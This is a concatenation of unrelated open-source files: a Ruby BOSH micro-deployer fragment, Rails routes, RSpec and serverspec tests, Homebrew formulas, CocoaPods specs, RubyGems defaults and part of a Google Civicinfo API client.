deployment_mf = Psych.load_file(File.expand_path(@options["manifest"]))
@spec = prep_spec(deployment_mf)
@packages = {}
@spec["job"] = { "name" => @options[:job] }
untar(@options["release"]) do |dir|
release_mf = Psych.load_file("release.MF")
jobs = []
jobs_to_compile(@options[:job], deployment_mf).each do |spec_job|
job = find_by_name(release_mf["jobs"], spec_job)
job_path = File.expand_path("jobs/#{job["name"]}.tgz")
jobs << apply_spec_job(job, job_path)
if job["name"] == @options[:job]
@spec["job"]["version"] = job["version"].to_s
@spec["job"]["template"] = @options[:job]
@spec["job"]["sha1"] = job["sha1"]
@spec["job"]["blobstore_id"] = @blobstore_client.create(File.new(job_path))
end
untar(job_path) do
job = Psych.load_file("job.MF")
# add default job spec properties to apply spec
add_default_properties(@spec["properties"], job["properties"])
# Compile job packages
compile_packages(dir, release_mf, job["packages"])
end
end
@spec["job"]["templates"] = jobs
end
cleanup
# save apply spec
FileUtils.mkdir_p(File.dirname(apply_spec))
File.open(apply_spec, 'w') { |f| f.write(Psych.dump(@spec)) }
@spec["packages"]
rescue => e
@logger.error("Error #{e.message}, #{e.backtrace.join("\n")}")
end
def find_by_name(enum, name)
result = enum.find { |j| j["name"] == name }
if result
result
else
raise "Could not find name #{name} in #{enum}"
end
end
# Check manifest for job collocation
def jobs_to_compile(name, manifest)
compile_job = manifest["jobs"].find { |j| j["name"] == name } if manifest["jobs"]
if compile_job
compile_job["template"]
else
[name]
end
end
def apply_spec_job(job, job_path)
{
"name" => job["name"],
"version" => job["version"].to_s,
"sha1" => job["sha1"],
"blobstore_id" => @blobstore_client.create(File.new(job_path))
}
end
def cleanup
FileUtils.rm_rf("#{@options["base_dir"]}/data/compile")
FileUtils.rm_rf("#{@options["base_dir"]}/data/packages")
FileUtils.rm_rf("#{@options["base_dir"]}/data/tmp")
FileUtils.rm_rf("#{@options["base_dir"]}/packages")
end
def prep_spec(deployment)
spec = {}
spec["deployment"] = "micro"
spec["release"] = deployment["release"]
spec["properties"] = deployment["properties"]
spec["index"] = 0
spec["packages"] = {}
spec["configuration_hash"] = {}
case @options[:cpi]
when "vsphere", "vcloud"
spec["networks"] = {"local" => {"ip" => "127.0.0.1"}}
when "aws"
spec["networks"] = {"type" => "dynamic"}
when "openstack"
spec["networks"] = {"type" => "dynamic"}
else
puts "WARNING: no CPI specified"
end
spec
end
def compile_packages(dir, manifest, packages)
packages.each do |name|
package = find_package(manifest, name)
compile_packages(dir, manifest, package["dependencies"]) if package["dependencies"]
@logger.debug "compiling package #{name}"
compile_package(dir, package, name)
end
end
def find_package(manifest, name)
manifest["packages"].detect { |p| p["name"] == name }
end
def compile_package(dir, package, name)
# return if package is already compiled
return if @spec["packages"].has_key?(name)
src = "#{dir}/packages/#{name}.tgz"
version = package["version"]
dependencies = package["dependencies"]
# push source package into blobstore
file = File.new(src)
id = @blobstore_client.create(file)
sha1 = "sha1"
dependencies = {}
package["dependencies"].each do |name|
@logger.debug "dependency: #{name} = #{@spec["packages"][name]}"
dependencies[name] = @spec["packages"][name]
end
result = @agent.run_task(:compile_package, id, sha1, name, version, dependencies)
@logger.info("result is #{result}")
# remove source package from blobstore
@blobstore_client.delete(id)
id = result["result"]["blobstore_id"]
@logger.debug("stored package #{name} as #{id}")
@spec["packages"][name] = {
"name" => name,
"version" => version.to_s,
"sha1" => result["result"]["sha1"],
"blobstore_id" => id
}
end
def untar(file)
prev_dir = Dir.getwd
dir = Dir.mktmpdir
Dir.chdir(dir)
@logger.debug("untaring #{file} into #{dir}")
out = `tar xzf #{file} 2>&1`
raise RuntimeError, "untar of #{file} failed: #{out}" unless $? == 0
yield dir
ensure
Dir.chdir(prev_dir)
FileUtils.rm_rf dir
end
def apply
connect_to_agent
FileUtils.mkdir_p(File.join(@options["base_dir"], 'data/log'))
# Stop services
@logger.info("Stopping services")
begin
@agent.run_task(:stop)
rescue => e
@logger.warn("Ignoring error to stop services #{e.inspect}")
end
@spec = Psych.load_file(@options["apply_spec"])
@logger.info("#{@spec.inspect}")
update_bosh_spec
@agent.run_task(:apply, @spec)
@logger.info("Starting services")
@agent.run_task(:start)
end
def update_bosh_spec
uri = URI.parse(@options["agent_uri"])
ip = uri.host
properties = @spec["properties"]
properties["blobstore"]["address"] = ip
properties["postgres"]["address"] = ip
properties["director"]["address"] = ip
properties["redis"]["address"] = ip
properties["nats"]["address"] = ip
@spec["properties"] = properties
end
def add_default_properties(spec_properties, job_properties)
return unless job_properties
job_properties.each_pair do |name, definition|
unless definition["default"].nil?
copy_property(spec_properties, spec_properties, name, definition["default"])
end
end
end
end
end
end
| 31.11985 | 108 | 0.55807 |
62d873b2eb860e985d5c3f87eef051de6116bb3c | 832 | Rails.application.routes.draw do
# For details on the DSL available within this file, see https://guides.rubyonrails.org/routing.html
root 'static_page#home'
# root to: 'static_page#home' # 上記はこれの省略形
get '/policy', to: 'static_page#policy'
get '/development', to: 'static_page#development'
get '/about', to: 'static_page#about'
get '/privacy', to: 'static_page#privacy'
# 参考に残しておく
get '/team', to: 'static_page#team'
get '/testimonials', to: 'static_page#testimonials'
get '/services', to: 'static_page#services'
get '/portfolio', to: 'static_page#portfolio'
get '/portfolio-details', to: 'static_page#portfolio_details'
get '/pricing', to: 'static_page#pricing'
get '/blog', to: 'static_page#blog'
get '/blog-single', to: 'static_page#blog_single'
get '/contact', to: 'static_page#contact'
end
| 37.818182 | 102 | 0.709135 |
d5856444904ddfce5fec0c570151f3eca0617ca8 | 749 | require File.expand_path(File.dirname(__FILE__) + '/edgecase')
class AboutTrueAndFalse < EdgeCase::Koan
def truth_value(condition)
if condition
:true_stuff
else
:false_stuff
end
end
def test_true_is_treated_as_true
assert_equal __, truth_value(true)
end
def test_false_is_treated_as_false
assert_equal __, truth_value(false)
end
def test_nil_is_treated_as_false_too
assert_equal __, truth_value(nil)
end
def test_everything_else_is_treated_as_true
assert_equal __, truth_value(1)
assert_equal __, truth_value(0)
assert_equal __, truth_value([])
assert_equal __, truth_value({})
assert_equal __, truth_value("Strings")
assert_equal __, truth_value("")
end
end
| 22.029412 | 62 | 0.734312 |
ed2090324fcbfc1a4c9cab32a104a6b49b4c86cf | 327 | require 'rails_helper'
require Rails.root.join('spec', 'models', 'shared_examples', 'non_null_field.rb')
describe Bookmark do
subject { build( :bookmark ) }
it { should validate_presence_of :user_id }
it { should validate_presence_of :project_id }
it { should belong_to :user }
it { should belong_to :project }
end | 27.25 | 81 | 0.730887 |
d55d41fab85e45ee6b289a3d9e467bcd640be6de | 2,070 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe ProjectFeatureUsage, type: :model do
describe '.jira_dvcs_integrations_enabled_count' do
it 'returns count of projects with Jira DVCS Cloud enabled' do
create(:project).feature_usage.log_jira_dvcs_integration_usage
create(:project).feature_usage.log_jira_dvcs_integration_usage
expect(described_class.with_jira_dvcs_integration_enabled.count).to eq(2)
end
it 'returns count of projects with Jira DVCS Server enabled' do
create(:project).feature_usage.log_jira_dvcs_integration_usage(cloud: false)
create(:project).feature_usage.log_jira_dvcs_integration_usage(cloud: false)
expect(described_class.with_jira_dvcs_integration_enabled(cloud: false).count).to eq(2)
end
end
describe '#log_jira_dvcs_integration_usage' do
let(:project) { create(:project) }
subject { project.feature_usage }
it 'logs Jira DVCS Cloud last sync' do
Timecop.freeze do
subject.log_jira_dvcs_integration_usage
expect(subject.jira_dvcs_server_last_sync_at).to be_nil
expect(subject.jira_dvcs_cloud_last_sync_at).to be_like_time(Time.current)
end
end
it 'logs Jira DVCS Server last sync' do
Timecop.freeze do
subject.log_jira_dvcs_integration_usage(cloud: false)
expect(subject.jira_dvcs_server_last_sync_at).to be_like_time(Time.current)
expect(subject.jira_dvcs_cloud_last_sync_at).to be_nil
end
end
context 'when log_jira_dvcs_integration_usage is called simultaneously for the same project' do
it 'logs the latest call' do
feature_usage = project.feature_usage
feature_usage.log_jira_dvcs_integration_usage
first_logged_at = feature_usage.jira_dvcs_cloud_last_sync_at
travel_to(1.hour.from_now) do
ProjectFeatureUsage.new(project_id: project.id).log_jira_dvcs_integration_usage
end
expect(feature_usage.reload.jira_dvcs_cloud_last_sync_at).to be > first_logged_at
end
end
end
end
| 34.5 | 99 | 0.753623 |
28436548b97bb1861c43c3dbe0e415083a44f05f | 720 | Pod::Spec.new do |s|
s.name = "DFUDependence"
s.version = "2.8.2"
s.summary = "DFUDependence SDK for iOS. "
s.homepage = "https://github.com/ttlock/iOS_TTLock_Demo"
s.license = { :type => "MIT", :file => "LICENSE" }
s.author = { "ttlock" => "[email protected]" }
s.platform = :ios, "8.0"
s.source = { :git => "https://github.com/ttlock/iOS_TTLock_Demo.git", :tag => "#{s.version}" }
s.vendored_frameworks = "TTLockFrameworks/DFUDependence.framework"
s.preserve_paths = "TTLockFrameworks/DFUDependence.framework"
s.library = "z"
s.requires_arc = true
s.xcconfig = { "ALWAYS_EMBED_SWIFT_STANDARD_LIBRARIES" => "YES","ENABLE_BITCODE" => "NO" }
end
| 40 | 101 | 0.622222 |
e87041e09d625c44220a3795c0ee1a848dcc13da | 984 | class Aescrypt < Formula
desc "Program for encryption/decryption"
homepage "http://aescrypt.sourceforge.net/"
url "http://aescrypt.sourceforge.net/aescrypt-0.7.tar.gz"
sha256 "7b17656cbbd76700d313a1c36824a197dfb776cadcbf3a748da5ee3d0791b92d"
bottle do
cellar :any_skip_relocation
sha256 "0cd940c7c9e59104746a8f83f92a06e703e7f98195a202d20516c03b588fd63f" => :el_capitan
sha256 "660c8a9266d7f85e699fb5bfabb82c508a66d303b2a2057c9c70a3c70fed43f6" => :yosemite
sha256 "a0bf8895165037991bf5b33be5c995e9b68a1d05898003a0ef45adb7aa3d3da9" => :mavericks
end
def install
system "./configure"
system "make"
bin.install "aescrypt", "aesget"
end
test do
(testpath/"key").write "kk=12345678901234567890123456789abc0"
require "open3"
Open3.popen3("#{bin}/aescrypt", "-k", testpath/"key") do |stdin, stdout, _|
stdin.write("hello")
stdin.close
# we can't predict the output
stdout.read.length > 0
end
end
end
| 30.75 | 92 | 0.738821 |
bf7fd7bd5df04564713c8c3cdf9e2b7c30c30338 | 9,054 | module MuckFriendsHelper
def all_friends(user)
render :partial => 'friends/all_friends', :locals => { :user => user }
end
# Renders a partial that contains the friends of the given user
# Parameters:
# user1: User whose friends are to be shown
# user2: User whose friends are to be checked to see if they are in common with user1
# limit: Number of records to show
# partial: The partial to render. Default is 'friend_simple' which renders an icon and name for each friend.
# Options include 'friend_icon' which only renders an icon or a custom partial. Place custom partials
# in app/views/friends
# no_friends_content: Content to render if no users are found. Pass ' ' to render nothing
def mutual_friends(user1, user2, limit = 6, no_friends_content = nil, partial = 'friend_simple')
return '' if user1.blank? || user2.blank?
users = user1.friends & user2.friends
users = users.first(limit)
no_friends_content ||= t('muck.friends.no_mutual_friends')
render_friends(users, partial, no_friends_content)
end
# Renders a partial that contains the friends of the given user
# Parameters:
# user: User whose friends are to be shown
# limit: Number of records to show
# partial: The partial to render. Default is 'friend_simple' which renders an icon and name for each friend.
# Options include 'friend_icon' which only renders an icon or a custom partial. Place custom partials
# in app/views/friends
# no_friends_content: Content to render if no users are found. Pass ' ' to render nothing
def friends(user, limit = 6, no_friends_content = nil, partial = 'friend_simple')
return '' if user.blank?
users = user.friends.find(:all, :limit => limit, :order => 'friends.created_at DESC')
no_friends_content ||= t('muck.friends.no_friends')
render_friends(users, partial, no_friends_content)
end
# Renders a partial that contains the friends of the given user
# Parameters:
# user: User whose friends are to be shown
# limit: Number of records to show
# partial: The partial to render. Default is 'friend_simple' which renders an icon and name for each friend.
# Options include 'friend_icon' which only renders an icon or a custom partial. Place custom partials
# in app/views/friends
# no_friends_content: Content to render if no users are found. Pass ' ' to render nothing
def followers(user, limit = 6, no_friends_content = nil, partial = 'friend_simple')
return '' if user.blank?
users = user.followers.find(:all, :limit => limit, :order => 'friends.created_at DESC')
no_friends_content ||= t('muck.friends.no_followers')
render_friends(users, partial, no_friends_content)
end
# Renders a partial that contains the friends of the given user
# Parameters:
# user: User whose friends are to be shown
# limit: Number of records to show
# partial: The partial to render. Default is 'friend_simple' which renders an icon and name for each friend.
# Options include 'friend_icon' which only renders an icon or a custom partial. Place custom partials
# in app/views/friends
# no_friends_content: Content to render if no users are found. Pass ' ' to render nothing
def followings(user, limit = 6, no_friends_content = nil, partial = 'friend_simple')
return '' if user.nil?
users = user.followings.find(:all, :limit => limit, :order => 'friends.created_at DESC')
no_friends_content ||= t('muck.friends.not_following_anyone')
render_friends(users, partial, no_friends_content)
end
# Render a list of all friend requests (if !MuckFriends.configuration.enable_following)
def friend_requests(user)
if !MuckFriends.configuration.enable_following
followers = user.followers
render :partial => 'friends/friend_requests', :locals => { :followers => followers } unless followers.blank?
end
end
def block_user_link(user, target)
return '' if user.blank?
friend = user.friendship_with(target)
return '' if friend.blank?
dom_id = make_block_id(user, target)
if friend.blocked?
return wrap_friend_link(link_to( I18n.t('muck.friends.unblock', :user => target.display_name), user_friend_path(user, friend, :target_id => target, :unblock => true), :class => 'ajax-update'), dom_id, 'friendship-block')
else
return wrap_friend_link(link_to( I18n.t('muck.friends.block', :user => target.display_name), user_friend_path(user, friend, :target_id => target, :block => true), :class => 'ajax-update'), dom_id, 'friendship-block')
end
end
# Render a follow/unfollow/friend request link appropriate to the current application settings and user relationship
# Requires enable_following and enable_friending be set in configuration see README
# If enable_following is true and enable_friending is false then only follow/unfollow links will be shown
# If enable_following is false and enable_friending is true then only friend request and unfriend links will be shown
# If enable_following is true and enable_friending is true then a hybrid model will be used. Users can follow
# each other without permission but a mutual follow will result in a friendship. Defriending a user will result in the
# other user becoming a follower
def friend_link(user, target)
# User not logged in
if user.blank?
if MuckFriends.configuration.enable_following
key = 'login_or_sign_up_to_follow'
elsif MuckFriends.configuration.enable_friending
key = 'login_or_sign_up_to_friend'
else
return ''
end
return wrap_friend_link(I18n.t("muck.friends.#{key}", :login => link_to(t('muck.friends.login'), login_path), :signup => link_to(t('muck.friends.signup'), signup_path)))
end
return '' if target.blank?
return '' if user == target
dom_id = make_id(user, target)
if MuckFriends.configuration.enable_friending
if user.friend_of?(target)
return wrap_friend_link(link_to( I18n.t('muck.friends.stop_being_friends_with', :user => target.display_name), user_friend_path(user, target), :class => 'ajax-delete'), dom_id)
elsif user.following?(target)
return wrap_friend_link( I18n.t('muck.friends.friend_request_pending', :link => link_to(I18n.t('muck.friends.delete'), user_friend_path(user, target), :class => 'ajax-delete')), dom_id)
end
elsif MuckFriends.configuration.enable_following
if user.following?(target)
return wrap_friend_link(link_to( I18n.t('muck.friends.stop_following', :user => target.display_name), user_friend_path(user, target), :class => 'ajax-delete'), dom_id)
end
end
if MuckFriends.configuration.enable_friending && user.followed_by?(target)
return wrap_friend_link(link_to( I18n.t('muck.friends.acccept_friend_request', :user => target.display_name), user_friends_path(user, :id => target), :class => 'ajax-update'), dom_id)
end
if MuckFriends.configuration.enable_following
wrap_friend_link(link_to( I18n.t('muck.friends.start_following', :user => target.display_name), user_friends_path(user, :id => target), :class => 'ajax-update'), dom_id)
elsif MuckFriends.configuration.enable_friending
wrap_friend_link(link_to( I18n.t('muck.friends.friend_request_prompt', :user => target.display_name), user_friends_path(user, :id => target), :class => 'ajax-update'), dom_id)
end
end
def accept_follower_link(user, target)
dom_id = make_id(user, target)
wrap_friend_link(link_to( I18n.t('muck.friends.accept'), user_friends_path(user, target), :id => "accept-#{target.id}", :class => 'notification-link ajax-update'), dom_id)
end
def ignore_friend_request_link(user, target)
dom_id = make_id(user, target)
wrap_friend_link(link_to( I18n.t('muck.friends.ignore'), user_friend_path(user, target), :id => "ignore-#{target.id}", :class => 'notification-link ajax-delete'), dom_id)
end
protected
# Handles render friend partials
def render_friends(users, partial, no_friends_content)
if users.length > 0
render :partial => "friends/#{partial}", :collection => users
else
if no_friends_content.length > 0 # Do this so that a user can pass ' ' to get a blank string output
no_friends_content
else
"<p class=\"no_friends_found\">#{no_friends_content}</p>"
end
end
end
def wrap_friend_link(link, dom_id = '', css = 'friendship-description')
content_tag(:span, link, :id => dom_id, :class => css)
end
def make_id(user, target)
user.dom_id(target.dom_id + '_friendship_')
end
def make_block_id(user, target)
user.dom_id(target.dom_id + '_block_')
end
end | 51.443182 | 226 | 0.690082 |
b9941b6a72e1008164b1c7845e38dad044ee744e | 341 | # frozen_string_literal: true
require 'date'
require 'prometheus/client'
require_relative 'g'
grunnbeløp_gauge = Prometheus::Client::Gauge.new(:grunnbeloep, docstring: 'Dagens grunnbeloep')
grunnbeløp_gauge.set(Grunnbeløp.by_date(DateTime.now)[:grunnbeløp])
prometheus = Prometheus::Client.registry
prometheus.register(grunnbeløp_gauge)
| 26.230769 | 95 | 0.815249 |
91a0a1b875ddf50cf05b162acb2469e182149e99 | 525 | class Prime::Chains::Ethereum < Prime::Chain
scope :enabled_for_staking, -> { where(eth2_staking_enabled: true) }
with_options if: :eth2_staking_enabled? do
validates :anjin_api_url, presence: true
validates :anjin_api_key, presence: true
validates :external_chain_id, presence: true, numericality: { only_integer: true }
end
def anjin_client(timeout: nil)
Prime::Anjin::Client.new(
anjin_api_url,
{
timeout: timeout,
authorization: anjin_api_key
}
)
end
end
| 26.25 | 86 | 0.691429 |
280672a40f4647a8ac21210cf4d8e4b6ca4b51dc | 1,527 | class Sysbench < Formula
desc "System performance benchmark tool"
homepage "https://github.com/akopytov/sysbench"
url "https://github.com/akopytov/sysbench/archive/1.0.20.tar.gz"
sha256 "e8ee79b1f399b2d167e6a90de52ccc90e52408f7ade1b9b7135727efe181347f"
license "GPL-2.0-or-later"
revision 1
head "https://github.com/akopytov/sysbench.git", branch: "master"
bottle do
sha256 cellar: :any, arm64_big_sur: "8f5fd6827291b2eb5f3a5b4c842a059182802d2ad97dcbd894046e5b2750914f"
sha256 cellar: :any, big_sur: "a9c638a46ddda6841018ad7354673315882a83e2aad7a480f46663db25e3c553"
sha256 cellar: :any, catalina: "f85e28b078ef05d9a155d0655275e6a9418494d94ab3dd524607a9c6ca84806b"
sha256 cellar: :any, mojave: "a29e37acd73943d5a1d72e6a5cb2f0812e2be3aeb061f919d271a8b31f2ac412"
sha256 cellar: :any_skip_relocation, x86_64_linux: "8f9cf704a34e18ddf2b4e826500a6b98b6e0df6e9b2dcf85e93dfe9f5fa2988f"
end
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
depends_on "pkg-config" => :build
depends_on "luajit-openresty"
depends_on "mysql-client"
depends_on "[email protected]"
uses_from_macos "vim" # needed for xxd
def install
system "./autogen.sh"
system "./configure", "--prefix=#{prefix}", "--with-mysql", "--with-system-luajit"
system "make", "install"
end
test do
system "#{bin}/sysbench", "--test=cpu", "--cpu-max-prime=1", "run"
end
end
| 40.184211 | 122 | 0.714473 |
21ee2796bd87b6888541cd3fdb1c7abded0da74a | 1,341 | # frozen_string_literal: true
require 'spec_helper'
describe 'Showing instance statistics' do
before do
sign_in user if user
end
# Using a path that is publicly accessible
subject { visit explore_projects_path }
context 'for unauthenticated users' do
let(:user) { nil }
it 'does not show the instance statistics link' do
subject
expect(page).not_to have_link('Instance Statistics')
end
end
context 'for regular users' do
let(:user) { create(:user) }
context 'when instance statistics are publicly available' do
before do
stub_application_setting(instance_statistics_visibility_private: false)
end
it 'shows the instance statistics link' do
subject
expect(page).to have_link('Instance Statistics')
end
end
context 'when instance statistics are not publicly available' do
before do
stub_application_setting(instance_statistics_visibility_private: true)
end
it 'shows the instance statistics link' do
subject
expect(page).not_to have_link('Instance Statistics')
end
end
end
context 'for admins' do
let(:user) { create(:admin) }
it 'shows the instance statistics link' do
subject
expect(page).to have_link('Instance Statistics')
end
end
end
| 21.983607 | 79 | 0.683072 |
62157bdce94072464a05b070ab6e4475b0d0b8c0 | 167 | class AddDeletedAtToInstances < ActiveRecord::Migration
def change
add_column :instances, :deleted_at, :datetime
add_index :instances, :deleted_at
end
end
| 23.857143 | 55 | 0.772455 |
33b6ab3f3e5cff1af86a7a6e1121c4d145c3ab9b | 4,852 | # frozen_string_literal: true
module Gem
DEFAULT_HOST = "https://rubygems.org".freeze
@post_install_hooks ||= []
@done_installing_hooks ||= []
@post_uninstall_hooks ||= []
@pre_uninstall_hooks ||= []
@pre_install_hooks ||= []
##
# An Array of the default sources that come with RubyGems
def self.default_sources
%w[https://rubygems.org/]
end
##
# Default spec directory path to be used if an alternate value is not
# specified in the environment
def self.default_spec_cache_dir
File.join Gem.user_home, '.gem', 'specs'
end
##
# Default home directory path to be used if an alternate value is not
# specified in the environment
def self.default_dir
path = if defined? RUBY_FRAMEWORK_VERSION
[
File.dirname(RbConfig::CONFIG['sitedir']),
'Gems',
RbConfig::CONFIG['ruby_version']
]
elsif RbConfig::CONFIG['rubylibprefix']
[
RbConfig::CONFIG['rubylibprefix'],
'gems',
RbConfig::CONFIG['ruby_version']
]
else
[
RbConfig::CONFIG['libdir'],
ruby_engine,
'gems',
RbConfig::CONFIG['ruby_version']
]
end
@default_dir ||= File.join(*path)
end
##
# Returns binary extensions dir for specified RubyGems base dir or nil
# if such directory cannot be determined.
#
# By default, the binary extensions are located side by side with their
# Ruby counterparts, therefore nil is returned
def self.default_ext_dir_for(base_dir)
nil
end
##
# Paths where RubyGems' .rb files and bin files are installed
def self.default_rubygems_dirs
nil # default to standard layout
end
##
# Path for gems in the user's home directory
def self.user_dir
parts = [Gem.user_home, '.gem', ruby_engine]
parts << RbConfig::CONFIG['ruby_version'] unless RbConfig::CONFIG['ruby_version'].empty?
File.join parts
end
##
# How String Gem paths should be split. Overridable for esoteric platforms.
def self.path_separator
File::PATH_SEPARATOR
end
##
# Default gem load path
def self.default_path
path = []
path << user_dir if user_home && File.exist?(user_home)
path << default_dir
path << vendor_dir if vendor_dir and File.directory? vendor_dir
path
end
##
# Deduce Ruby's --program-prefix and --program-suffix from its install name
def self.default_exec_format
exec_format = RbConfig::CONFIG['ruby_install_name'].sub('ruby', '%s') rescue '%s'
unless exec_format =~ /%s/
raise Gem::Exception,
"[BUG] invalid exec_format #{exec_format.inspect}, no %s"
end
exec_format
end
##
# The default directory for binaries
def self.default_bindir
if defined? RUBY_FRAMEWORK_VERSION # mac framework support
'/usr/bin'
else # generic install
RbConfig::CONFIG['bindir']
end
end
##
# A wrapper around RUBY_ENGINE const that may not be defined
def self.ruby_engine
if defined? RUBY_ENGINE
RUBY_ENGINE
else
'ruby'
end
end
##
# The default signing key path
def self.default_key_path
File.join Gem.user_home, ".gem", "gem-private_key.pem"
end
##
# The default signing certificate chain path
def self.default_cert_path
File.join Gem.user_home, ".gem", "gem-public_cert.pem"
end
##
# Install extensions into lib as well as into the extension directory.
def self.install_extension_in_lib # :nodoc:
true
end
##
# Directory where vendor gems are installed.
def self.vendor_dir # :nodoc:
if vendor_dir = ENV['GEM_VENDOR']
return vendor_dir.dup
end
return nil unless RbConfig::CONFIG.key? 'vendordir'
File.join RbConfig::CONFIG['vendordir'], 'gems',
RbConfig::CONFIG['ruby_version']
end
##
# Default options for gem commands for Ruby packagers.
#
# The options here should be structured as an array of string "gem"
# command names as keys and a string of the default options as values.
#
# Example:
#
# def self.operating_system_defaults
# {
# 'install' => '--no-rdoc --no-ri --env-shebang',
# 'update' => '--no-rdoc --no-ri --env-shebang'
# }
# end
def self.operating_system_defaults
{}
end
##
# Default options for gem commands for Ruby implementers.
#
# The options here should be structured as an array of string "gem"
# command names as keys and a string of the default options as values.
#
# Example:
#
# def self.platform_defaults
# {
# 'install' => '--no-rdoc --no-ri --env-shebang',
# 'update' => '--no-rdoc --no-ri --env-shebang'
# }
# end
def self.platform_defaults
{}
end
end
| 23.215311 | 92 | 0.634171 |
6286a276a7932112f4ff685a66f7d628d010bc35 | 309 | class NavicatForPostgresql < Cask
version '11.0.18'
sha256 'de6e44791b99d33c05da075b33d473a4e512297b17d1549fcda43a831b00ddac'
url 'http://download.navicat.com/download/navicat110_pgsql_en.dmg'
homepage 'http://www.navicat.com/products/navicat-for-postgresql'
link 'Navicat for PostgreSQL.app'
end
| 30.9 | 75 | 0.805825 |
f7ac39cdbb19678108c0cc88edac4f657e79b0fd | 2,016 | # Copyright 2014, Abiquo
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'serverspec_helper'
describe 'Collectd installation' do
it 'all collectd packages are installed' do
if os[:family] == 'ubuntu'
expect(package('collectd-core')).to be_installed
expect(package('libpython2.7')).to be_installed
else
expect(package('collectd')).to be_installed
end
end
it 'all configuration files are present' do
if os[:family] == 'ubuntu'
expect(file('/etc/collectd/collectd.conf')).to exist
expect(file('/usr/lib/collectd')).to be_directory
else
expect(file('/etc/collectd.conf')).to exist
if os[:arch] == 'x86_64'
expect(file('/usr/lib64/collectd')).to be_directory
else
expect(file('/usr/lib/collectd')).to be_directory
end
end
end
it 'the default plugins are installed' do
config_file = os[:family] == 'ubuntu'? '/etc/collectd/collectd.conf' : '/etc/collectd.conf'
expect(file(config_file)).to contain('LoadPlugin "cpu"')
expect(file(config_file)).to contain('LoadPlugin "memory"')
expect(file(config_file)).to contain('LoadPlugin "disk"')
expect(file(config_file)).to contain('LoadPlugin "interface"')
end
it 'the collectd service is running' do
expect(service('collectd')).to be_enabled
expect(service('collectd')).to be_running
end
end
| 37.333333 | 99 | 0.652778 |
5d3117f919498ccfa5bc45934f940fde27e2b271 | 718 | cask "wpsoffice" do
version "2.3.0,3826"
sha256 "2dfb2472f65c3721db0aa7ab36d168c481b128ff4098d2f1ecc2c3126e791329"
# wdl1.pcfg.cache.wpscdn.com/ was verified as official when first introduced to the cask
url "https://wdl1.pcfg.cache.wpscdn.com/wpsdl/macwpsoffice/download/#{version.before_comma}.#{version.after_comma}/WPSOffice_#{version.before_comma}(#{version.after_comma}).dmg"
name "WPS Office"
homepage "https://www.wps.com/mac/"
depends_on macos: ">= :sierra"
app "wpsoffice.app"
uninstall quit: "com.kingsoft.wpsoffice.mac.global"
zap trash: [
"~/Library/Application Scripts/com.kingsoft.wpsoffice.mac.global",
"~/Library/Containers/com.kingsoft.wpsoffice.mac.global",
]
end
| 34.190476 | 179 | 0.750696 |
ac3f406ee4877d982de5984854cd2ccbc1eb1b65 | 923 | Pod::Spec.new do |s|
s.name = 'Taplytics'
s.version = '1.2.14'
s.author = { 'Taplytics' => '[email protected]' }
s.license = { :type => 'Commercial', :text => 'See http://taplytics.com/terms' }
s.homepage = 'http://taplytics.com'
s.summary = 'iOS framework for using the Taplytics native mobile A/B testing service.'
s.description = 'For installation instructions, please visit: https://github.com/taplytics/taplytics-ios-sdk'
s.source = { :git => 'https://github.com/taplytics/taplytics-ios-sdk.git', :tag => "#{s.version}" }
s.platform = :ios, '6.0'
s.frameworks = 'CFNetwork', 'Security', 'CoreTelephony', 'SystemConfiguration'
s.weak_frameworks = 'AdSupport'
s.requires_arc = true
s.library = 'icucore'
s.preserve_paths = 'Taplytics.framework'
s.public_header_files = "Taplytics.framework/**/*.h"
s.vendored_frameworks = "Taplytics.framework"
end
| 48.578947 | 112 | 0.658722 |
39d54ced76b938947f85ee7a7526b566d8b2474c | 61,054 | # Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'date'
require 'google/apis/core/base_service'
require 'google/apis/core/json_representation'
require 'google/apis/core/hashable'
require 'google/apis/errors'
module Google
module Apis
module CivicinfoV2
# Describes information about a regional election administrative area.
class AdministrationRegion
include Google::Apis::Core::Hashable
# Information about an election administrative body (e.g. County Board of
# Elections).
# Corresponds to the JSON property `electionAdministrationBody`
# @return [Google::Apis::CivicinfoV2::AdministrativeBody]
attr_accessor :election_administration_body
# An ID for this object. IDs may change in future requests and should not be
# cached. Access to this field requires special access that can be requested
# from the Request more link on the Quotas page.
# Corresponds to the JSON property `id`
# @return [String]
attr_accessor :id
# Describes information about a regional election administrative area.
# Corresponds to the JSON property `local_jurisdiction`
# @return [Google::Apis::CivicinfoV2::AdministrationRegion]
attr_accessor :local_jurisdiction
# The name of the jurisdiction.
# Corresponds to the JSON property `name`
# @return [String]
attr_accessor :name
# A list of sources for this area. If multiple sources are listed the data has
# been aggregated from those sources.
# Corresponds to the JSON property `sources`
# @return [Array<Google::Apis::CivicinfoV2::Source>]
attr_accessor :sources
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@election_administration_body = args[:election_administration_body] if args.key?(:election_administration_body)
@id = args[:id] if args.key?(:id)
@local_jurisdiction = args[:local_jurisdiction] if args.key?(:local_jurisdiction)
@name = args[:name] if args.key?(:name)
@sources = args[:sources] if args.key?(:sources)
end
end
# Information about an election administrative body (e.g. County Board of
# Elections).
class AdministrativeBody
include Google::Apis::Core::Hashable
# A URL provided by this administrative body for information on absentee voting.
# Corresponds to the JSON property `absenteeVotingInfoUrl`
# @return [String]
attr_accessor :absentee_voting_info_url
#
# Corresponds to the JSON property `addressLines`
# @return [Array<String>]
attr_accessor :address_lines
# A URL provided by this administrative body to give contest information to the
# voter.
# Corresponds to the JSON property `ballotInfoUrl`
# @return [String]
attr_accessor :ballot_info_url
# A simple representation of an address.
# Corresponds to the JSON property `correspondenceAddress`
# @return [Google::Apis::CivicinfoV2::SimpleAddressType]
